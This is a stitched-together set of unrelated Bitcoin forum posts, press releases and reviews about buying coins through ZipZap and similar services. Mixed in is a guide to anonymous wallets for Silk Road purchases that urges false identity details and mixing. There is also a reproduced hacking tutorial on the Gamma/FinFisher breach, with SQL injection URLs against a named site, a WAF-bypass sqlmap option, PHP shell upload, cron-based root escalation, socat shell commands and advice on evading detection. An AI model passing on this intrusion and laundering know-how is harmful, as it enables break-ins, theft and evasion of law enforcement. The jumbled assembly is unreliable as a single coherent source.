I've been hodling and adding to my stash since 2012. Went through the Gox debacle, Silk Road, inputs.io, slaying of the bearwhale, BitLicense, ETF, and countless ups and downs. In the beginning, I tried trading on Gox, but always got lost in the FUD, emotion what I began to realize was manipulation. And I realized that I had no skill in playing that game. Except one skill. I had faith based on a deep understanding of what bitcoin was. I read the whitepaper. I understood the implications and bought in. (Thank you Orlin Grabbe, RIP) So I bought more. I bought in through dwolla/Gox, bit-instant/ZipZap, localbitcoins, etc. And I kept buying. I mixed my coins (losing a chunk to Coinlender), traded gold for coins on Agora, and kept building my hodlings while putting them in cold encrypted storage. Never sell was my motto, and I watched what was about a $20K gamble/investment grow to much much more. Enough to retire. I watched the price constantly. Wake up at night, check the price. Wake up in the morning, check the price. And I read all of the news, the blogs, reddit (both /btc and /bitcoin, and others). I invested my Roth in GBTC. My wife's as well. I told my mainstream friends about bitcoin. All who told me I was crazy. Maybe a little I admitted. Satoshi said it would either be worth 0 or be very valuable. I chose to believe the latter. But recently I got discouraged. The civil war was real. Both sides bloodied, with hidden agendas following hidden money. Sock puppets manipulating opinion, threats by miners to fork and jump ship. Doom and gloom. Price crashes, big bear predictions, doom is nigh! And I almost gave up. Almost imported my cold coins to sell. Then I saw through the fog of war. Bitcoin is anti-fragile. ANTI-FRAGILE. Weak hands sell. Traders and whales sell/buy. Manipulators buy/sell. Maybe after the next halving, I'll sell. But not now. I'll continue to hodl. Maybe even buy some more. Just thought I'd share.
BuyBitcoin.sg introduces bitcoin purchase at 28,000 agents throughout United Kingdom today
www.BuyBitcoin.sg Bitcoin reseller BuyBitcoin.sg announced that it is now accepting cash payments at thousands of locations throughout United Kingdom. “We are excited to present the easiest and fastest way to buy bitcoins in United Kingdom” said Lasse Olesen, CEO of BuyBitcoin.sg. "When signing up at BuyBitcoin.sg you can choose to buy Bitcoins with a cash deposit. We simply send a cash payment confirmation that you deliver to one of our many agents. Within minutes the cash payment is confirmed and the bitcoins will be in your wallet." To provide this service, BuyBitcoin.sg has partnered with ZipZap Inc. to manage the cash payment infrastructure. In other words, BuyBitcoin.sg offers UK residents a consistent way to get bitcoins using cash without dealing with international payments. “This is a key piece of infrastructure that allows Bitcoin to grow further in the UK,” said Olesen. Try it for yourself at www.BuyBitcoin.sg. ABOUT BUYBITCOIN.SG BuyBitcoin.sg is a website of DGT Pte Ltd, an international Bitcoin reseller based in Singapore. DGT consists of a team with years of experience in the digital currency exchange space. Founder and CEO Lasse Olesen is also known as the founder of trusted European Bitcoin reseller Bitcoin Nordic, which has been serving the European market since early 2012. www.buybitcoin.sg www.bitcoinnordic.com ABOUT ZIPZAP INC. ZipZap, Inc. is the largest global cash payment network, enabling consumers to buy bitcoin with cash at over 28,000 payment center locations throughout the UK, with more territories coming soon. Founded in 2010, ZipZap is headquartered in San Francisco, California, with operations around the globe. For more information about ZipZap, visit http://www.zipzapinc.com. CONTACT DGT Pte Ltd (BuyBitcoin.sg), 1 North Bridge Road #03-23, High Street Centre, Singapore, 179094, E-mail: [email protected] ZipZap Inc., San Francisco, California, E-mail: [email protected] Instructions:
A Step-by-Step Guide to Creating an Anonymous Wallet for Covert Practices
A Step-by-Step Guide to Creating an Anonymous Wallet for Covert Practices With the recent Bitcoin “bubble” fiasco and the subsequent rise and fall of Bitcoin value, it seems that this subreddit has become obsessed with making money. But get-rich-quick schemes are not at the heart of Bitcoin. Instead BTC should be seen as a way to keep Big Governments and Big Businesses from knowing how much money you have and what you choose to spend that money on. As a currency, it doesn't matter how much the value fluctuates if you plan on spending your wealth on sites like the Silk Road and etc. (OK, maybe it does matter a little bit if the money you spent yesterday is worth twice as much today; but this guide is for spenders, not hoarders. Or at least for hoarders who also like to spend.) Let's discuss my favorite attribute of the Bitcoin protocol: anonymity. Many noobs getting into the Bitcoin game fail to realize that anonymity is an important key to understanding the importance of Bitcoin. In places where your wealth can easily be taking away from you (see Cyprus, Russia, China, the USA and others), Bitcoin can function like a store of cash buried in a dessert in the middle of nowhere – buried so deep that nobody can find it, not even the most powerful men and women on Earth. POINT:If you are purchasing your Bitcoins through services like Coinbase or Mt. Gox, and if you've ever given your real name and bank account information to a Bitcoin Exchange, then you are NOT anonymous. Your Bitcoins can be traced back to you. Your purchases are recorded in the blockchain, and although it's difficult, it's certainly not impossible for those with the knowhow to find you and prosecute you. See this link before continuing. Bitcoin is not inherently anonymous. You must take steps to protect yourself in order to keep your identity a secret. And even still, if you don't know what you are doing, you run the risk of being caught. So if you care about hiding yourself and your money, I offer this guide as a way to accomplish secret purchases and covert trades. Of course I cannot guarantee you won't end up in jail. At the end of the day, nobody knows how closely governments are tracking BTC purchases over the TOR network. Some people even believe that the TOR network was created by nefarious forces. I doubt it, but you never really know. STEP ONE: Anonymous Hardware Because you cannot really know whether or not you are being watched, your first step in creating an anonymous wallet is to protect yourself by buying a cheap laptop computer and removing the hard-drive. Really, who needs a hard-drive anyway? Toss it in the garbage. STEP TWO: Anonymous Software If you don't know how to download a Linux LiveCD, then stop reading now. You are probably not skilled enough to protect yourself anyway. If you don't know how to download a Linux LiveCD, then proceed with extreme caution; downloading an ISO file and burning it to a DVD is pretty damned easy. Easier than anonymity. Those who refuse to learn are at risk. It's arguable which software you should use, but I recommend connecting to the TOR network using TAILS, a live DVD or live USB that aims at preserving your privacy and anonymity. TAILS helps you to use the Internet anonymously, leave no trace on the computer you're using, and to use state-of-the-art cryptographic tools to encrypt your files, email and instant messaging. ProTip: For an extra layer of protection, download the ISO from your local library's computer. Or while you're sipping a mocha at Starbuck's. Then burn it to a DVD and take it home. Place it in your crap computer (the one without a hard-drive) and turn it on. Enter the BIOS menu and boot from CD if your computer doesn't do it automatically. DO NOT CONNECT TO THE NETWORK FROM YOUR HOME. I repeat, for an extra layer of security, DO NOT CONNECT TO YOUR HOME WIFI USING TAILS IF YOU WANT TO DO SHADY THINGS. That's just common sense. TAILS itself isn't illegal. But if you're the type to do shady things, you don't want to practice on your home Wifi, which you probably pay for with a bank account or credit card. After you've spent a day or two using TAILS and familiarizing yourself with the LinuxOS, and once you feel comfortable enough to continue, then head back to your local Starbucks, boot up the LiveCD, and connect. Browse the TOR network and triple-check that you are protected. You can do this by checking your IP address for DNS LEAKS. Only if you feel comfortably hidden from prying eyes will you want to continue. STEP THREE: Creating an Anonymous Wallet There are several different ways to to this, but the easiest way is to use the code at bitadress.org. Thanks to SpenserHanson for creating this thread which describes the process in detail:
Save bitaddress.org.html to your computer
Disable computer Wi-Fi.
Open bitaddress.org.html in browser.
Generate an address and record the private keys.
Close the browser window.
Go home. Think about what you are about to do.
STEP FOUR: Funding the Anonymous Wallet Funding your wallet will be the most difficult part of this process. Obviously you don't want to go to a site like Coinbase or Mt. Gox and link up you bank account, then start sending coins to your anonymous address. That would be stupid. Very stupid. Probably the best way to get coins is to know someone who is willing to send you a few, but even then you lead a trail back to your friend. My suggestion is to make cash deposits through ZipZap or Bitinstant, and give them false information (for example, use the new email you created, over the TOR network, from a site like Hotmail or Yahoo, which doesn't require a phone number to sign up – I'm looking at you Gmail. Make sure your new account forwards your email to yet another account, perhaps Tormail or a temp address. You probably won't need to use the email more than once anyway, for confirmation, if you need it. And you might want to create a new address with every deposit, just to be safe). There are other options of course. Some companies will sell you Bitcoins anonymously through Bank of America cash deposits. But remember that the moment you walk into a Big Bank and give them money, you are caught on camera. Maybe offer a homeless man some money to make the deposit for you. And hope he doesn't just pocket your money. Regardless, you want to stay away from Big Banks if you can. It really isn't that hard. If you absolutely must make deposits from your bank account, you could send your coins to an anonymous online wallet first and then to cold storage, but make sure to use several mixing services over a period of several days. And then have trouble sleeping at night. Another great idea is to use the localbitcoins website; meet with a seller locally; pay cash and GTFO. STEP FOUR: Spending from the Anonymous Wallet If you are looking to CASH OUT, there aren't many anonymous options besides meeting with somebody and selling face to face. You could always sign up for your own account at localbitcoins, then hope a buyer contacts you. But this guide isn't about making money, it's about spending your coins. To buy things, you'll want to go to back to the library, connect through TAILS, download a lite client like Electrum and access your account. Every time you want to spend, you will have to re-download, but it should not take more than a few minutes. And though you are probably safe enough to spend directly from the client, if you really want to be safe you should send the funds to a second wallet though a mixing service, then to a third or fourth or fifth wallet, also through mixing services. These “Mixing Wallets” should NOT be created using the TOR network because the TOR exit node may be monitored. I've never had a problem myself, but it's theoretically possible that an attacker could record the password/private keys for the hosted wallet and steal your coins. Which is why you should NEVER USE THE SAME ACCOUNT TWICE. And never access your cold storage wallet through the net. That would be very very bad. To created the mixing wallets you will also need a way to hide your identify without using TOR. The best way to do this is to sign up for a VPN service though a public WiFi hotspot and then pay in Bitcoin. The best service I have found is called Private Internet Access. You can access their service through a public computer, connect to the VPN, and voila, you now can safely create mixing wallets without exposing your password to the open network. Make sure that after you mix the coins you send them all to a safe, final address, which will be your Spending Wallet. Remaining anonymous will cost your some time and money. With each transaction you're going to have to pay for mixing, and also the transaction fee. And setting up a new email and a new account with every transaction (so that you can spread the coins across multiple fake accounts) will be bothersome but worth it in the long run. You can't put a price on piece of mind when it comes to your safety. REMEMBER Your Spending Wallet should not contain all of your funds. The bulk of your coins should be address you created using bitaddress. Never trust an online service to hold the bulk of your funds. The recent hacks have shown that the best place to store your private key is in your head. Final Notes: The Bitcoin protocol itself is not anonymous. And theoretically it's possible to trace every transaction back to you. This is why you need to use fake emails, many multiple addresses, and a VPN service with heavy encryption. Even with the knowledge and the technology to map the blockchain, the FEDS will have a hell of a time tracking multiple address though VPN tunneling back to a cold storage wallet that you created offline and only use to send coins over TOR. There are just too many roadblocks. Of course nothing is impossible. But I sleep very good at night knowing that my door is not going to be kicked in by the Men in Black. And even if you're not doing anything illegal, this sort of behavior is certainly suspicious. If you were lucky enough to receive a tip from Reddit's own bitcoinbillionaire (I myself was not) and you haven't cashed out. Create a VPN-tunneled throwaway account and tip yourself before claiming your coins. Then send them through a mixing service and to your cold storage address. Now you're on your way to being an anonymous spender. I hope this guide helps. I really do. The purpose of Bitcoin isn't to make money. It's to protect the money that you already have, and to protect your identity in places where your identity is compromised. Everybody in the world wants your money, especially the richest of the rich. You ought to do everything you can to keep yourself safe. Especially if you live in a compromised geography. TL;DR: Go directly to jail. Do not pass Go. Do not collect $200. EDIT: Some typos.
My horrible BitInstant/ZipZap/MoneyGram/7-Eleven experience
Here's my experience using BitInstant to get a VouchX code at 1:00am. TL;DR: Undisclosed fees; lots of personal details; what should have taken 5 minutes took 45; apathetic 7-Eleven clerk couldn't take ownership of issues with his company's own shitty kiosk; BitInstant sends me the money in a form not quite as insecure as banknotes taped to a postcard. It was a late Thursday night, dipping into early Friday. BitMe had a low bid price for BTC. With BitMe, I'd usually deposit at a Chase branch, but I expected the price to rise too much by the time I could make it to a branch and the BitMe guy could confirm my deposit. I anticipated a lot of people putting their Friday paychecks into Bitcoin, so I was in a rush to buy. For this reason, I decided to pay the premium of BitInstant. The first disappointment with BitInstant was that in order to deposit at a MoneyGram terminal, I'd have to pay an additional $3.95 to another middleman called "ZipZap." The BitInstant site doesn't mention this extra fee on the main page, where the 3.99% commission amount is quoted. The earliest point in time that I could learn the amount of the $3.95 extra fee was after I filled in order information (including my name and date of birth) on BitInstant, was taken to ZipZap, filled in my phone number, selected a MoneyGram location, and then finally downloaded the payment slip. ZipZap sent me an e-mail, but their mail servers weren't configured correctly, so I never got it. My e-mail server logs show:
Mar 8 03:20:16 ophelia postfix/smtpd: connect from smtp.zipzapinc.com[184.108.40.206] Mar 8 03:20:16 ophelia postfix/smtpd: NOQUEUE: reject: RCPT from ... smtp.zipzapinc.com[220.127.116.11]: 504 5.5.2 : ... Helo command rejected: need fully-qualified hostname; from= ... to= proto=ESMTP helo= Mar 8 03:20:16 ophelia postfix/smtpd: disconnect from smtp.zipzapinc.com[18.104.22.168]
ZipZap's web page says something to the effect of "anonymous payment." Later, at the MoneyGram location, I had to provide my name, phone number, and mailing address. (The address was never needed by BitInstant or ZipZap.) I chose 7-Eleven store #18256 at 924 E. Empire Ave., Spokane, WA 99207 as the MoneyGram location, because 7-Eleven was the only local chain of MoneyGram locations open at that hour. Their MoneyGram solution was a Vcom kiosk. These multifunction kiosks, in addition to providing ATM and check services also act as MoneyGram terminals. The first irk in the process was that the machine asked me to call a certain phone number for MoneyGram customer service, and no courtesy phone was provided on the machine. The store clerk didn't have a phone for me to use either. I wasted $1.26 on a 7 minute phone call from my by-the-minute phone (with plans optimized for texting, not voice). In 7 minutes, my name, address, phone number, "receive code" (a unique code for ZipZap), and payment amount was taken; it could have taken me no longer than 2 minutes for me to carefully enter and double-check this information on the terminal itself. I understand there is a market for customer service that delivers warm fuzzies, but this wasted my time and money and subjected me to a guy not from my continent who was difficult to hear over the connection. Now it was time to deposit the money. The machine instructed me to insert one bill at a time, so I did. I was paying $385 in 20 banknotes. The machine would accept one banknote, give a message "not enough cash inserted," wait about 15 seconds, then show me the balance of how much money remains to be inserted. Well, of course not enough money was inserted, I don't have a $385 banknote and you told me to insert one at a time! I counted later to find that the machine processes banknotes at a rate of once every 20 seconds, so I spent over six minutes hand-feeding money into this machine, in front of a bored clerk at a slow 7-Eleven. I felt really bad for that guy, since he had store work to do and pretty much had to babysit me to make sure I wasn't going to walk off with anything. Finally, the last note! Okay, it's doing .. something, and ... "this transaction could not be completed at this time." [Paraphrased, but no specific reason was given.] The machine then took a couple minutes to return my money, this time in the form of 16 banknotes. At least all my money was accounted for, but what gives? The clerk tried to convince me that the machine doesn't work, and suggested I try calling whoever I'm trying to pay at 8:00am, start of business. I explained to him that this payment is time sensitive, that's why I'm doing this in the middle of the night. Finally, it dawned on me that I never gave my "account number," a unique identifying code for the ZipZap transaction, to the MoneyGram phone agent. But he did ask for my phone number twice! I must have misheard him. Drat. I let the clerk know what my mistake was, but he tried his hardest to convince me that the machine didn't work as intended and suggested I try another 7-Eleven that was about an hour and a half on foot for me. I declined and told him I'd use the payphone to reach MoneyGram this time. Back from another 5-10 call, I come into the store to find a note taped over the machine's screen, "out of order." The clerk is at this point telling me with matter-of-fact authority in his voice that the machine won't do what I want, and that it's out of service for everything but ATM and MoneyGram transactions. (Even after I tried several times to explain, he wouldn't accept that I was in fact trying to do a MoneyGram transaction.) Even though I explained to him that this is a time-sensitive payment--that is why I'm up at 2:00 in the morning taking care of this business--and it will be a 45 minute walk home for nothing, he insists that I am not allowed to use the machine. He even explicitly told me that he has work to do and it's taken him too long keeping an eye on me. I plead with him and sympathize about how horribly slow these machines are, how it's not his fault, and finally get through to him to let me try one more time, the final persuasive argument being that the machine gave me my money in $100 notes this time, so it won't take so long. (I didn't let him know that only two notes were $100s, while the rest were in $20s and $1s, but it was still fewer notes.) He doesn't even have the courtesy to say "yes," "okay," "sure," or "just one more time;" he just peels off his because-I-can "out of order" sign off the machine and goes about his business without saying a word. Seriously? What's the point of this fancy self-serve kiosk if I need to call some guy in the Indian subcontinent to set up the transaction? How many millions of dollars were poured into the design, implementation, and rollout of these good-for-nothing machines that take ages to accept your cash? And then to have some apathetic, underpaid store clerk tell me he's got better things to do than take responsibility for how slowly his company's proprietary, fancy e-commerce kiosks work? Remember, he intentionally mislead me earlier by telling me another 7-Eleven store has a similar machine that might work, and (as it turns out) flat-out lied in telling me the machine is simply out of order. Oh, and I'm paying $3.95 to ZipZap for this, most of which probably goes to the MoneyGram commission. Wondering how many middle-men there were between my money and my Bitcoin, by the way? BitMe, AurumXchange (for VouchX), BitInstant, ZipZap, MoneyGram, CardTronics (current owners of the brilliant Vcom franchise of time-saving kiosks), and 7-Eleven. Holy wow, maybe $3.95 + 3.99% was a steal. All said, I spent about 45 minutes in that store. For what should have been 5 minutes worth of business. Beyond the pale. On the second attempt, my money went through, I got a receipt, and when I got home I got a neat code I could paste into BitMe to get some instant USD in there. But let's not forget the final blunder: BitInstant delivered a code worth $365 good-as-cash to me by regular, unencrypted e-mail. Stupid. Now I'm fighting bidding bots on BitMe.
--1-- Introduction I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple it is, and to hopefully inform and inspire you to go out and hack shit. If you have no experience with programming or hacking, some of the text below might look like a foreign language. Check the resources section at the end to help you get started. And trust me, once you've learned the basics you'll realize this really is easier than filing a FOIA request. -- 2 -- Staying Safe This is illegal, so you'll need to take same basic precautions:
(Optional) While just having everything go over Tor thanks to Whonix is probably sufficient, it's better to not use an internet connection connected to your name or address. A cantenna, aircrack, and reaver can come in handy here.
As long as you follow common sense like never do anything hacking related outside of Whonix, never do any of your normal computer usage inside Whonix, never mention any information about your real life when talking with other hackers, and never brag about your illegal hacking exploits to friends in real life, then you can pretty much do whatever you want with no fear of being v&. NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable for some things like web browsing, when it comes to using hacking tools like nmap, sqlmap, and nikto that are making thousands of requests, they will run very slowly over Tor. Not to mention that you'll want a public IP address to receive connect back shells. I recommend using servers you've hacked or a VPS paid with bitcoin to hack from. That way only the low bandwidth text interface between you and the server is over Tor. All the commands you're running will have a nice fast connection to your target. -- 3 -- Mapping out the target Basically I just repeatedly use fierce.pl, whois lookups on IP addresses and domain names, and reverse whois lookups to find all IP address space and domain names associated with an organization. For an example let's take Blackwater. We start out knowing their homepage is at academi.com. Running fierce.pl -dns academi.com we find the subdomains:
Doing a whois lookup on academi.com reveals it's also registered to the same address, so we'll use that as a string to search with for the reverse whois lookups. As far as I know all the actual reverse whois lookup services cost money, so I just cheat with google:
Now run fierce.pl -range on the IP ranges you find to lookup dns names, and fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more whois lookups and repeat the process until you've found everything. Also just google the organization and browse around its websites. For example on academi.com we find links to a careers portal, an online store, and an employee resources page, so now we have some more:
If you repeat the whois lookups and such you'll find academiproshop.com seems to not be hosted or maintained by Blackwater, so scratch that off the list of interesting IPs/domains. In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com was simply a whois lookup of finfisher.com which found it registered to the name "FinFisher GmbH". Googling for:
"FinFisher GmbH" inurl:domaintools
finds gamma-international.de, which redirects to finsupport.finfisher.com ...so now you've got some idea how I map out a target. This is actually one of the most important parts, as the larger the attack surface that you are able to map out, the easier it will be to find a hole somewhere in it. -- 4 -- Scanning & Exploiting Scan all the IP ranges you found with nmap to find all services running. Aside from a standard port scan, scanning for SNMP is underrated. Now for each service you find running:
Is it exposing something it shouldn't? Sometimes companies will have services running that require no authentication and just assume it's safe because the url or IP to access it isn't public. Maybe fierce found a git subdomain and you can go to git.companyname.come/gitweb/ and browse their source code.
Is it horribly misconfigured? Maybe they have an ftp server that allows anonymous read or write access to an important directory. Maybe they have a database server with a blank admin password (lol stratfor). Maybe their embedded devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's default password.
Is it running an old version of software vulnerable to a public exploit?
Webservers deserve their own category. For any webservers, including ones nmap will often find running on nonstandard ports, I usually:
Browse them. Especially on subdomains that fierce finds which aren't intended for public viewing like test.company.com or dev.company.com you'll often find interesting stuff just by looking at them.
Run nikto. This will check for things like webserve.svn/, webservebackup/, webservephpinfo.php, and a few thousand other common mistakes and misconfigurations.
Identify what software is being used on the website. WhatWeb is useful
First try that against all services to see if any have a misconfiguration, publicly known vulnerability, or other easy way in. If not, it's time to move on to finding a new vulnerability: 5) Custom coded web apps are more fertile ground for bugs than large widely used projects, so try those first. I use ZAP, and some combination of its automated tests along with manually poking around with the help of its intercepting proxy. 6) For the non-custom software they're running, get a copy to look at. If it's free software you can just download it. If it's proprietary you can usually pirate it. If it's proprietary and obscure enough that you can't pirate it you can buy it (lame) or find other sites running the same software using google, find one that's easier to hack, and get a copy from them. For finsupport.finfisher.com the process was:
Start nikto running in the background.
Visit the website. See nothing but a login page. Quickly check for sqli in the login form.
See if WhatWeb knows anything about what software the site is running.
WhatWeb doesn't recognize it, so the next question I want answered is if this is a custom website by Gamma, or if there are other websites using the same software.
I view the page source to find a URL I can search on (index.php isn't exactly unique to this software). I pick Scripts/scripts.js.php, and google: allinurl:"Scripts/scripts.js.php"
I find there's a handful of other sites using the same software, all coded by the same small webdesign firm. It looks like each site is custom coded but they share a lot of code. So I hack a couple of them to get a collection of code written by the webdesign firm.
At this point I can see the news stories that journalists will write to drum up views: "In a sophisticated, multi-step attack, hackers first compromised a web design firm in order to acquire confidential data that would aid them in attacking Gamma Group..." But it's really quite easy, done almost on autopilot once you get the hang of it. It took all of a couple minutes to:
google allinurl:"Scripts/scripts.js.php" and find the other sites
Notice they're all sql injectable in the first url parameter I try.
Realize they're running Apache ModSecurity so I need to use sqlmap with the option --tamper='tampemodsecurityversioned.py'
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it's database admin! For MySQL this means you can read and write files. It turns out the site has magicquotes enabled, so I can't use INTO OUTFILE to write files. But I can use a short script that uses sqlmap --file-read to get the php source for a URL, and a normal web request to get the HTML, and then finds files included or required in the php source, and finds php files linked in the HTML, to recursively download the source to the whole site. Looking through the source, I see customers can attach a file to their support tickets, and there's no check on the file extension. So I pick a username and password out of the customer database, create a support request with a php shell attached, and I'm in! -- 5 -- (fail at) Escalating < got r00t? >
Root over 50% of linux servers you encounter in the wild with two easy scripts, Linux_Exploit_Suggester, and unix-privesc-check. finsupport was running the latest version of Debian with no local root exploits, but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer so I add to /etc/cron.hourly/webalizer:
wait an hour, and ....nothing. Turns out that while the cron process is running it doesn't seem to be actually running cron jobs. Looking in the webalizer directory shows it didn't update stats the previous month. Apparently after updating the timezone cron will sometimes run at the wrong time or sometimes not run at all and you need to restart cron after changing the timezone. ls -l /etc/localtime shows the timezone got updated June 6, the same time webalizer stopped recording stats, so that's probably the issue. At any rate, the only thing this server does is host the website, so I already have access to everything interesting on it. Root wouldn't get much of anything new, so I move on to the rest of the network. -- 6 -- Pivoting The next step is to look around the local network of the box you hacked. This is pretty much the same as the first Scanning & Exploiting step, except that from behind the firewall many more interesting services will be exposed. A tarball containing a statically linked copy of nmap and all its scripts that you can upload and run on any box is very useful for this. The various nfs-* and especially smb-* scripts nmap has will be extremely useful. The only interesting thing I could get on finsupport's local network was another webserver serving up a folder called 'qateam' containing their mobile malware. -- 7 -- Have Fun Once you're in their networks, the real fun starts. Just use your imagination. While I titled this a guide for wannabe whistleblowers, there's no reason to limit yourself to leaking documents. My original plan was to:
Hack Gamma and obtain a copy of the FinSpy server software
Find vulnerabilities in FinSpy server.
Scan the internet for, and hack, all FinSpy C&C servers.
Identify the groups running them.
Use the C&C server to upload and run a program on all targets telling them who was spying on them.
Use the C&C server to uninstall FinFisher on all targets.
Join the former C&C servers into a botnet to DDoS Gamma Group.
It was only after failing to fully hack Gamma and ending up with some interesting documents but no copy of the FinSpy server software that I had to make due with the far less lulzy backup plan of leaking their stuff while mocking them on twitter. Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password already so I can move on to step 2! -- 8 -- Other Methods The general method I outlined above of scan, find vulnerabilities, and exploit is just one way to hack, probably better suited to those with a background in programming. There's no one right way, and any method that works is as good as any other. The other main ways that I'll state without going into detail are: 1) Exploits in web browers, java, flash, or microsoft office, combined with emailing employees with a convincing message to get them to open the link or attachment, or hacking a web site frequented by the employees and adding the browsejava/flash exploit to that. This is the method used by most of the government hacking groups, but you don't need to be a government with millions to spend on 0day research or subscriptions to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit for a couple thousand, and rent access to one for much less. There's also metasploit browser autopwn, but you'll probably have better luck with no exploits and a fake flash updater prompt. 2) Taking advantage of the fact that people are nice, trusting, and helpful 95% of the time. The infosec industry invented a term to make this sound like some sort of science: "Social Engineering". This is probably the way to go if you don't know too much about computers, and it really is all it takes to be a successful hacker. -- 9 -- Resources Links:
http://www.dest-unreach.org/socat/ Get usable reverse shells with a statically linked copy of socat to drop on your target and: target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM host$ socat file:tty,raw,echo=0 tcp-connect:localhost:PORTNUM It's also useful for setting up weird pivots and all kinds of other stuff.
The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
Aside from the hacking specific stuff almost anything useful to a system administrator for setting up and administering networks will also be useful for exploring them. This includes familiarity with the windows command prompt and unix shell, basic scripting skills, knowledge of ldap, kerberos, active directory, networking, etc. -- 10 -- Outro You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a tool. It's not selling hacking tools that makes Gamma evil. It's who their customers are targeting and with what purpose that makes them evil. That's not to say that tools are inherently neutral. Hacking is an offensive tool. In the same way that guerrilla warfare makes it harder to occupy a country, whenever it's cheaper to attack than to defend it's harder to maintain illegitimate authority and inequality. So I wrote this to try to make hacking easier and more accessible. And I wanted to show that the Gamma Group hack really was nothing fancy, just standard sqli, and that you do have the ability to go out and take similar action. Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned hackers, dissidents, and criminals!
Did anybody else just see this posted? (And quickly deleted) Ziggap founder states all other Bitcoin companies are part of organized crime. Screenshot: http://imgur.com/5pXE979
Hello /bitcoin, The reason ZIGGAP is not currently up is because my competition has been selectively scamming me. You see the following organizations are all ran by the same group of organized crime and money launderers: OKPay BitInstant Coinbase Coinabul BTC-E MtGox Dwolla (Was created just to ACH money through bitinstant before coinbase came about) Bitfloor Bitme Localbitcoins Coinapult Coinlab Bitstamp Virwox ZipZap (No I didn't know before I signed up with them) TrustCash (Owned and operated by Arthur Britto, even though he has a standin listed as the company director. Arthur is the one who answers the phones with a different name, FYI) BTCJam And probably more. I don't run that way. I have zero interest in laundering money. My competition however doesn't like that I wont play ball with them, and as a result they have been scamming me out of funding everywhere I go. I was told that if I didn't either 1) Give half my company to a member of this organization or 2) Close my doors that I was going to get sued or have funds taken from me. I've been ramping back up to relaunch ZIGGAP and have been attempting to purchase Bitcoin for sale and have had it go wrong in mysterious ways every time I try. When I go to MtGox to buy their website goes down, when I try to create a company account the sign up page doesn't work. Low and behold when I use a different name it works fine. When I wire funds to BTC-E they hold the wire and ask for the same documentation over and over. I tried to withdrawal money from BTC-E and the withdrawal is just stuck on "pending" and the money is gone. When I tried to pay the loan on BTC-Jam the loan says it's not paid but the Bitcoin is gone. Celso is not responding. When I buy, there are massive selloffs. You get the idea. The simple process of trying to buy Bitcoin has resulted in over $20,000 of ZIGGAP's money being held in multiple locations with zero recourse for me since these locations are overseas. I've tried recalling wires just to have them denied. So I guess that's it. ZIGGAP is not coming back, not because I don't want to, but because I'm being shut out of Bitcoin and being scammed from over and over. I'm out. Obviously people are going to make me into a scammer and doing everything they can to get the site shut down. I now do not have enough funds to continue operation. Thanks Bitcoin community! It's greatly appreciated. I never realized this was a just organized crime racket or I never would have participated in the first place. I thought this was about the next generation currency. Boy was I fucking wrong. I'm going to have to file bankruptcy now because of these people. -Ryan
Can we as a community put together a list comparing the different ways to get BitCoins, the times involved, etc?
I'm not sure what format would be the best. Maybe we could get it added to the Reddit SilkRoad Wiki. Since these services come and go, it is quite interesting at times how to get BitCoins. Things to include: -Country -Method of original payment -Time for payment to clear -Time for BitCoin transaction to cleat -What percentage of money is taken by BitCoin transaction -Total Time of Transaction Here is what I have used in the past: BlockChain cash deposit through BitInstant in the USA - Blockchain accesses ZipZap payment service, ZipZap then instructs user to use MoneyGram express. Moneygram express is used anonymously at a WalMart, which excepts debit for purchase. ZipZap payment goes through BitInstant, finally BitInstant transfers to BlockChain account. Total time 30mins to several hours. Requires driving to Moneygram site. Fees - ZipZap $3.95. BitInstant 3.99% CoinBase by bank transfer: Create a CoinBase account (USA only). Confirm back account wiring. Since buying BitCoins is legal, I see no problem with this. Coins can be ordered through CoinBase at a 1% fee. Once the account is set up the transactions take 3-5 business days to be confirmed. Small fee, longer wait time than BitInstant. I would like to know more methods of transfer and how they work. I also signed up for a Dwolla account, but would have to go through BitInstant (I believe). I feel like this would be massively beneficial to the community! I am also looking for a method that could be done within a day, preferably use bank transfer, and have a percentage loss at about 2% or less. Lets hear the methods and get a permanent working source going!
ZIGGAP is now offering Cash Payments via your local bill payment center!
Hello Reddit, Through a strategic partnership with ZipZap, inc. ZIGGAP is now offering you the ability to get Bitcoin using your local bill payment center! This means you can now buy Bitfcoin from any Walmart, CVS, 7-11, Walgreens, and more! This is a limited test run with a certain amount of Bitcoin while we work to refine our processes. All you have to do is place an order and go to your local payment center agent. And as always if you have any problems during the ordering process our live chat, phone, and ticket support is at your disposal 7 days a week. So what are you waiting for? Go get some Bitcoin at ZIGGAP.com! -ZIGGAP
I had seen on here how some people experienced problems with bitinstant, and was thus wary when deciding to use it this morning. I read up on the How to buy bitcoins page on the sidebar, and felt pretty comfortable. I then submitted the bitinstant request for a Moneygram -> paper wallet transaction, and got my moneygram (via zip zap) payment slip. Went down to the corner CVS, used that creepy red phone to confirm the moneygram order, and payed the cashier. Not 5 minutes out the door I get an e-mail on my phone notifying me that my transaction has been completed. I checked my paper wallet and voila, easy as cake. Locked in the price I wanted when I wanted, when coinbase was rejecting any transactions due to volume shortages. All-in-all a win-win day with bitinstant.
Buying Bitcoins in local shop using ZipZap - Review
Hi, crossposted from a reply in /Bitcoin Having seen that ZipZap (www.zipzapinc.com) have re-enabled purchasing bitcoins through their service I decided to try them out, see how troublesome (or easy) the process was. I used https://buybitcoin.sg/buy/ as they were giving away 0.1 to first user to try the service. Process was as followed:
